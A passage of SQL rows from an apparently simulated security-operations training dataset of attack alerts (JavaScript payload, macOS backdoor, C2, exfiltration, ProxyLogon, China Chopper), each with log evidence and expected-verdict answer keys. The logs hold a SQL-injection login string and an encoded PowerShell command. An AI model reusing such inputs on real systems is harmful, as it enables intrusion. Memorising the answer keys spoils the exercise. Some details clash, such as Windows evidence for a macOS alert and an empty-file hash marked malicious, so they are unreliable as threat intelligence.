(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36\\\",\\\"status_code\\\":200,\\\"response_size\\\":4521,\\\"malicious_js_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.928Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:52Z\\\",\\\"client_ip\\\":\\\"192.168.1.105\\\",\\\"request_method\\\":\\\"GET\\\",\\\"host\\\":\\\"humanrights.org\\\",\\\"url\\\":\\\"/index.html\\\",\\\"referrer\\\":\\\"http://malicious-redirect.com/landing\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36\\\",\\\"status_code\\\":200,\\\"response_size\\\":4521,\\\"malicious_js_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(335, 'Obfuscated JavaScript Execution', 'high', 'Browser Security Logs', 'The obfuscated JavaScript payload is executed on visitor\'s browsers, preparing the system for malware deployment. This indicates the transition from web-based compromise to client-side infection.', 'Execution', 'T1059.007 - JavaScript', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:57Z\",\"event_id\":\"JS-Exec-20231015-143\",\"source_ip\":\"198.51.100.23\",\"destination_ip\":\"192.168.1.15\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36\",\"script_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"affected_user\":\"jdoe\",\"script_name\":\"obfuscated_payload.js\",\"referrer\":\"http://malicious-example.com/landing\"}', '2026-01-02 20:31:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel DB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Platform\",\"verdict\":\"malicious\",\"details\":\"Hash identified as part of a known JavaScript exploit kit.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"obfuscated_payload.js\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"malicious\",\"details\":\"File name associated with obfuscated scripts used in attacks.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.930Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:57Z\\\",\\\"event_id\\\":\\\"JS-Exec-20231015-143\\\",\\\"source_ip\\\":\\\"198.51.100.23\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36\\\",\\\"script_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"affected_user\\\":\\\"jdoe\\\",\\\"script_name\\\":\\\"obfuscated_payload.js\\\",\\\"referrer\\\":\\\"http://malicious-example.com/landing\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.930Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:57Z\\\",\\\"event_id\\\":\\\"JS-Exec-20231015-143\\\",\\\"source_ip\\\":\\\"198.51.100.23\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36\\\",\\\"script_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"affected_user\\\":\\\"jdoe\\\",\\\"script_name\\\":\\\"obfuscated_payload.js\\\",\\\"referrer\\\":\\\"http://malicious-example.com/landing\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.930Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:57Z\\\",\\\"event_id\\\":\\\"JS-Exec-20231015-143\\\",\\\"source_ip\\\":\\\"198.51.100.23\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36\\\",\\\"script_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"affected_user\\\":\\\"jdoe\\\",\\\"script_name\\\":\\\"obfuscated_payload.js\\\",\\\"referrer\\\":\\\"http://malicious-example.com/landing\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.930Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:57Z\\\",\\\"event_id\\\":\\\"JS-Exec-20231015-143\\\",\\\"source_ip\\\":\\\"198.51.100.23\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36\\\",\\\"script_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"affected_user\\\":\\\"jdoe\\\",\\\"script_name\\\":\\\"obfuscated_payload.js\\\",\\\"referrer\\\":\\\"http://malicious-example.com/landing\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.930Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:57Z\\\",\\\"event_id\\\":\\\"JS-Exec-20231015-143\\\",\\\"source_ip\\\":\\\"198.51.100.23\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36\\\",\\\"script_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"affected_user\\\":\\\"jdoe\\\",\\\"script_name\\\":\\\"obfuscated_payload.js\\\",\\\"referrer\\\":\\\"http://malicious-example.com/landing\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(336, 'Custom Backdoor Installation', 'high', 'Endpoint Detection and Response (EDR)', 'An attacker has successfully installed a custom backdoor on macOS systems. This persistence mechanism allows continuous access and control over the infected systems of users who visited the compromised site.', 'Persistence', 'T1547: Boot or Logon Autostart Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:00Z\",\"event_type\":\"persistence\",\"src_ip\":\"203.0.113.45\",\"dest_ip\":\"10.0.0.5\",\"username\":\"jdoe\",\"file_path\":\"/Users/jdoe/Library/LaunchAgents/com.example.backdoor.plist\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"process_name\":\"launchd\",\"process_id\":1234,\"sha256_hash\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"user_agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0\"}', '2026-01-02 20:31:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with malware distribution.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with a known macOS backdoor.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"/Users/jdoe/Library/LaunchAgents/com.example.backdoor.plist\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"File used to maintain persistence for a backdoor.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(337, 'Command and Control (C2) Communication Detected', 'high', 'Network Traffic Analysis', 'This alert highlights the establishment of communication between the backdoor and the attacker\'s C2 servers, enabling further actions.', 'Lateral Movement', 'T1071.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:45Z\",\"src_ip\":\"192.168.1.45\",\"dst_ip\":\"185.92.220.133\",\"protocol\":\"HTTP\",\"method\":\"POST\",\"url\":\"http://malicious-domain.com/command\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"payload\":\"Encrypted data\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"jdoe\"}', '2026-01-02 20:31:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.92.220.133\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server IP used for malicious activities.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-domain.com/command\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Domain associated with C2 communication.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash known for malware payload.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Username of the potentially compromised account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(338, 'Data Exfiltration Attempt', 'high', 'Data Loss Prevention (DLP) Systems', 'An unauthorized transfer of sensitive data was detected. The attacker attempted to exfiltrate proprietary data from the internal network to an external IP address.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:35Z\",\"event_id\":\"EXFIL-2023-10-15-142235\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"file_name\":\"financial_report_Q3.pdf\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user\":\"jdoe\",\"action\":\"blocked\",\"alert_trigger\":\"Data Exfiltration Policy\",\"bytes_transferred\":1048576,\"description\":\"Attempted transfer of classified financial document via HTTPS to untrusted external IP.\"}', '2026-01-02 20:31:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal corporate network IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with exfiltration activities\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Integrity Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Unrecognized file hash for sensitive document\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"HR System\",\"verdict\":\"internal\",\"details\":\"Employee account\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"financial_report_Q3.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"Document Management System\",\"verdict\":\"sensitive\",\"details\":\"Confidential financial document\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.933Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:35Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-10-15-142235\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"financial_report_Q3.pdf\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_trigger\\\":\\\"Data Exfiltration Policy\\\",\\\"bytes_transferred\\\":1048576,\\\"description\\\":\\\"Attempted transfer of classified financial document via HTTPS to untrusted external IP.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.933Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:35Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-10-15-142235\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"financial_report_Q3.pdf\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_trigger\\\":\\\"Data Exfiltration Policy\\\",\\\"bytes_transferred\\\":1048576,\\\"description\\\":\\\"Attempted transfer of classified financial document via HTTPS to untrusted external IP.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.933Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:35Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-10-15-142235\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"financial_report_Q3.pdf\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_trigger\\\":\\\"Data Exfiltration Policy\\\",\\\"bytes_transferred\\\":1048576,\\\"description\\\":\\\"Attempted transfer of classified financial document via HTTPS to untrusted external IP.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.933Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:35Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-10-15-142235\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"financial_report_Q3.pdf\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_trigger\\\":\\\"Data Exfiltration Policy\\\",\\\"bytes_transferred\\\":1048576,\\\"description\\\":\\\"Attempted transfer of classified financial document via HTTPS to untrusted external IP.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.933Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:35Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-10-15-142235\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"financial_report_Q3.pdf\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_trigger\\\":\\\"Data Exfiltration Policy\\\",\\\"bytes_transferred\\\":1048576,\\\"description\\\":\\\"Attempted transfer of classified financial document via HTTPS to untrusted external IP.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(339, 'Initial Access via ProxyLogon Zero-Day', 'critical', 'Exchange server logs', 'Hafnium exploits the ProxyLogon zero-day vulnerabilities to breach the organization\'s perimeter defenses, marking the beginning of their operation.', 'Exploit', 'T1190 - Exploit Public-Facing Application', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-17T04:12:34Z\",\"src_ip\":\"203.0.113.45\",\"dest_ip\":\"192.168.1.10\",\"username\":\"SYSTEM\",\"exploit\":\"ProxyLogon\",\"url\":\"/owa/auth/x.js\",\"user_agent\":\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file_name\":\"shell.aspx\"}', '2026-01-03 00:04:00', '2026-02-18 12:19:42', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_service\",\"verdict\":\"malicious\",\"details\":\"Known Hafnium IP associated with ProxyLogon exploits.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal Exchange server IP.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_db\",\"verdict\":\"malicious\",\"details\":\"Hash associated with web shell used in ProxyLogon exploit.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"shell.aspx\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_analysis_tool\",\"verdict\":\"malicious\",\"details\":\"Web shell file used for remote access.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.934Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-17T04:12:34Z\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dest_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"SYSTEM\\\",\\\"exploit\\\":\\\"ProxyLogon\\\",\\\"url\\\":\\\"/owa/auth/x.js\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"shell.aspx\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.934Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-17T04:12:34Z\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dest_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"SYSTEM\\\",\\\"exploit\\\":\\\"ProxyLogon\\\",\\\"url\\\":\\\"/owa/auth/x.js\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"shell.aspx\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.934Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-17T04:12:34Z\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dest_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"SYSTEM\\\",\\\"exploit\\\":\\\"ProxyLogon\\\",\\\"url\\\":\\\"/owa/auth/x.js\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"shell.aspx\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.934Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-17T04:12:34Z\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dest_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"SYSTEM\\\",\\\"exploit\\\":\\\"ProxyLogon\\\",\\\"url\\\":\\\"/owa/auth/x.js\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"shell.aspx\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.934Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-17T04:12:34Z\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dest_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"SYSTEM\\\",\\\"exploit\\\":\\\"ProxyLogon\\\",\\\"url\\\":\\\"/owa/auth/x.js\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"shell.aspx\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(340, 'Web Shell Deployment - China Chopper', 'high', 'Web server logs', 'Following initial access, Hafnium deploys the China Chopper web shell to maintain persistent access and command capabilities on the compromised server. The web shell allows remote control and execution of commands on the server.', 'Malware Installation', 'T1505.003 - Web Shell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T13:45:23Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.100\",\"http_method\":\"POST\",\"requested_url\":\"/uploads/chopper.jsp\",\"response_code\":200,\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36\",\"filename\":\"chopper.jsp\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"webadmin\"}', '2026-01-03 00:04:00', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Associated with known APT activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal web server\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Known hash for China Chopper web shell\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"chopper.jsp\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"Web shell filename used by 